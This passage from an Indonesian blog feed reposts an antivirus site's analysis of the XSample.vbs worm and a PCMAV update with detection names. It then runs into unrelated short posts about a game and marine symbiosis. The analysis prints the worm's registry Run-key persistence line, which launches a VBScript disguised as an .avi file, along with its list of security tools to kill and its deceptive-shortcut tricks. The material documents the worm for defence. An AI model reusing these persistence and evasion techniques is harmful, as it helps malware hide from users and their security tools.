<li> abc.exe</li>
<li> abcd.exe</li>
<li> cmd.exe</li>
<li> install.exe</li>
<li> msconfig.exe</li>
<li> mspaint.exe</li>
<li> notepad.exe</li>
<li> notepad++.exe</li>
<li> PCMAV.exe</li>
<li> processexplorer.exe</li>
<li> processhacker.exe</li>
<li> regedit.exe</li>
<li> regedt32.exe</li>
<li> RegistryEditor.exe</li>
<li> SbieCtrl.exe</li>
<li> setup.exe</li>
<li> Smadav.exe</li>
<li> taskmgr.exe</li>
<li> vmware-vmx.exe</li>
</ol></li>
<li>Mengcopykan file FreeJAV.com_Hot-Student.avi ke Folder Windows</li>
<li>Membuat Startup dengan nama Drives:</li>
<div><div class="syntaxhighlighter plain" id="highlighter_840626"><div class="toolbar"><a class="toolbar_item command_help help" href="http://virusindonesia.com/2011/02/11/xsample-vbs-aku-berhasil-masuk-ke-komputer-kamu/#">?</a></div><table border="0" cellpadding="0" cellspacing="0"><tbody>
<tr><td class="gutter"><div class="line number1 index0 alt2">1</div><div class="line number2 index1 alt1">2</div></td><td class="code"><div class="container"><div class="line number1 index0 alt2"><code class="plain plain">HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Drives</code></div><div class="line number2 index1 alt1"><code class="plain plain">wscripT.exe //E:VBScripT C:\WINDOWS\FreeJAV.com_Hot-Student.avi</code></div></div></td></tr>
</tbody></table></div></div><li>Disable beberapa fungsi windows: <ol><li>Turn Off</li>
<li>Log Off</li>
<li>Run Command</li>
<li>Search</li>
<li>File Associate</li>
<li>MSI Installer</li>
<li>Limit System Restore dan disable Sysem Restore</li>
</ol></li>
<li>Merubah nama Properties pada My Computer</li>
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_5.PNG" title="XSample.vbs" />
<li>Merubah Nama Internet Explorer menjadi:</li>
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_6.PNG" title="XSample.vbs" />
<li>Membuat file shortcut pengganti untuk Shutdown, Restart, dan Log Off.</li>
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_7.PNG" title="XSample.vbs" />
<li>Menghapus salah satu key pada registry yang berfungsi untuk membedakan file shortcut dan yang bukan shorcut. Sehingga hasilnya adalah tanda panah ka atas pada file shortcut menjadi hilang.</li>
<li>Membuat File shortcut dengan nama yang bisa menipu user.</li>
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_9.PNG" title="XSample.vbs" />
<li>Jika mouse di arahkan ke dalam folder RECYCER, maka akan ada pesan sepert gambar di bawah ini.</li>
<img alt="XSample.vbs" src="http://virusindonesia.com/wp-content/uploads/2011/02/xsample/X-Sample.vbs_10.PNG" title="XSample.vbs" /></ul><b><br />
PCMAV 4.6 Update Build3</b><br />
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.6 Update Build3 telah hadir dengan penambahan <b>120 </b> pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.6, sangat disarankan segera melakukan <i>update</i>, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.<img alt="" src="http://virusindonesia.com/2011/02/11/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><img alt="" src="http://virusindonesia.com/2011/02/11/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /><br />
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan <i>proxy</i>, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih <i>Update</i>.<br />
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:<br />
<a href="http://www.sendspace.com/file/i5nwn0" target="_blank" title="SendSpace.com">SendSpace.com</a><br />
<a href="http://www37.zippyshare.com/v/21799898/file.html" target="_blank" title="ZippyShare.com">ZippyShare.com</a> (mirror)<br />
<a href="http://rapidshare.com/files/446811576/update.vdb" target="_blank" title="RapidShare.com">Rapidshare.com</a> (mirror)<br />
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup <b>menimpanya</b>. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.<br />
<b>Daftar tambahan virus hingga PCMAV 4.6 Update Build3:</b><br />
Acehku.vbs<br />
Amoumain<br />
BlackId<br />
Delp-Shortcut<br />
Delp-Shortcut.lnk.A<br />
Delp-Shortcut.lnk.B<br />
Delp-Shortcut.lnk.C<br />
Delp-Shortcut.lnk.D<br />
Delp-Shortcut.lnk.E<br />
Dhoos<br />
Dhoos.dll<br />
Dhoos.url.A<br />
Dhoos.url.B<br />
Dhoos.url.C<br />
Ebetazijl.A<br />
Ebetazijl.A.inf<br />
Ebetazijl.B<br />
Ebetazijl.B.lnk<br />
FakeAV-Downloader.G<br />
FakeAV-Downloader.H<br />
FakeAV-Downloader.H.job<br />
FakeAV-Downloader.H.lnk.A<br />
FakeAV-Downloader.H.lnk.B<br />
FakeAV-Downloader.H.lnk.C<br />
FakeAV-Downloader.H.msi<br />
FakeAV-Downloader.H.setup<br />
FakeAV-Downloader.H.url<br />
FakeAV-Downloader.H.xml<br />
FakeAV-Downloader.I<br />
FakeAV-Downloader.I.dat<br />
FakeAV-Downloader.I.job<br />
FakeAV-Downloader.I.lnk.<br />
FakeAV-Downloader.I.lnk.A<br />
FakeAV-Downloader.I.lnk.B<br />
FakeAV-Downloader.I.lnk.C<br />
FakeAV-Downloader.I.ref<br />
FakeAV-Downloader.I.rtf<br />
FakeAV-Downloader.I.setup<br />
FakeAV-Downloader.I.unins<br />
FakeAV-Downloader.I.url<br />
FakeAV-Downloader.J.host<br />
FakeAV-Downloader.J.ico<br />
FakeAV-Downloader.J.job<br />
FakeAV-Downloader.J.lnk.A<br />
FakeAV-Downloader.J.lnk.B<br />
FakeAV-Downloader.J.lnk.C<br />
FakeAV-Downloader.J.setup<br />
FakeAV-Downloader.J.url<br />
FakeAV-Downloader.J.xml<br />
FakeAV-Downloader.K<br />
FakeAV-Downloader.K.dat<br />
FakeAV-Downloader.K.dll.A<br />
FakeAV-Downloader.K.dll.B<br />
FakeAV-Downloader.K.dll.C<br />
FakeAV-Downloader.K.job<br />
FakeAV-Downloader.K.lnk.A<br />
FakeAV-Downloader.K.lnk.B<br />
FakeAV-Downloader.K.lnk.C<br />
FakeAV-Downloader.K.lnk.D<br />
FakeAV-Downloader.K.ref<br />
FakeAV-Downloader.K.rtf<br />
FakeAV-Downloader.K.unins<br />
FakeAV-Downloader.K.url<br />
FakeDownloader.A<br />
FakeDownloader.B<br />
FakeDownloader.B.dll.A<br />
FakeDownloader.B.dll.B<br />
FakeDownloader.C<br />
FakeDownloader.C.dll.A<br />
FakeDownloader.C.dll.B<br />
FakeDownloader.D<br />
FakeDownloader.D.dll<br />
FakeDownloader.D.exe<br />
FakeDownloader.E<br />
FakeDownloader.F<br />
FakeDownloader.F.bat<br />
FakeDownloader.F.job<br />
FakeDownloader.G<br />
FakeDownloader.G.DLL<br />
FakeDownloader.H<br />
FakeDownloader.H.bat<br />
FakeDownloader.H.job<br />
FakeDownloader.H.sim<br />
FakeDownloader.I<br />
FakeDownloader.J<br />
FakeDownloader.K<br />
FakeDownloader.L<br />
FakeDownloader.L.exe<br />
FakeDownloader.M<br />
FakeDownloader.N<br />
FakeDownloader.O<br />
HoneyMoon.vbs<br />
HoneyMoon.vbs.inf<br />
Khetex.B<br />
NDI.vbs<br />
NDI.vbs.gen<br />
NDI.vbs.inf<br />
NDI.vbs.txt<br />
NineOClock<br />
Rascal.B<br />
Restore.D<br />
Restore.D.inf<br />
Restore.E<br />
Restore.E.inf<br />
SkyNet.F<br />
Spesial<br />
VB-Shortcut-1.lnk<br />
Vedasetion<br />
Vedasetion.tmp<br />
Vemo-AV<br />
XSample.vbs<br />
XSample.vbs.inf<br />
XSample.vbs.ini<br />
XSample.vbs.lnk.A<br />
XSample.vbs.lnk.B<br />
XSample.vbs.lnk.C<br />
XSample.vbs.lnk.D<br />
XSample.vbs.lnk.E<br />
XSample.vbs.lnk.F<br />
XSample.vbs.mp3Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-77498461669572145682010-11-11T21:04:00.000-08:002010-11-11T21:08:09.240-08:00Divine KidsYang mo liat2 Game terbaru karya dari Divine Kids Klik aja <a href="http://www.divinekids.com/"><span style="text-decoration: underline;">disini</span></a>Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-38537456474114353802010-08-07T02:52:00.001-07:002010-08-07T03:15:56.425-07:007 Keajaiban Simbiotic di Lautan<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/__1vJ9_mZqcI/TF0vqr8lluI/AAAAAAAAAEY/Im1wDwTOrhs/s1600/symbiotic-animals.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 144px; height: 134px;" src="http://3.bp.blogspot.com/__1vJ9_mZqcI/TF0vqr8lluI/AAAAAAAAAEY/Im1wDwTOrhs/s200/symbiotic-animals.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5502606730114471650" /></a><br />Evolusi -dengan pro kontranya- adalah sesuatu yang menakjubkan, tapi spesies-spesies yang secara bersama mengembangkan cara hidup saling melindungi, memberi makan, atau membersihkan pasangannya adalah suatu yang lebih spekatukler. Hiu berpasangan dengan ikan-ikan, ikan dengan udang, dan udang dengan ketimun laut (sea cucumber) dan masih banyak lagi. Inilah contoh hubungan simbiosis yang radikal dari kedalaman samudera di dunia.Rofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0tag:blogger.com,1999:blog-3900150514182505180.post-6645530452952351282010-08-06T10:45:00.001-07:002010-08-06T10:45:40.110-07:00BirdRofiq Sanusihttp://www.blogger.com/profile/07733592728326937100noreply@blogger.com0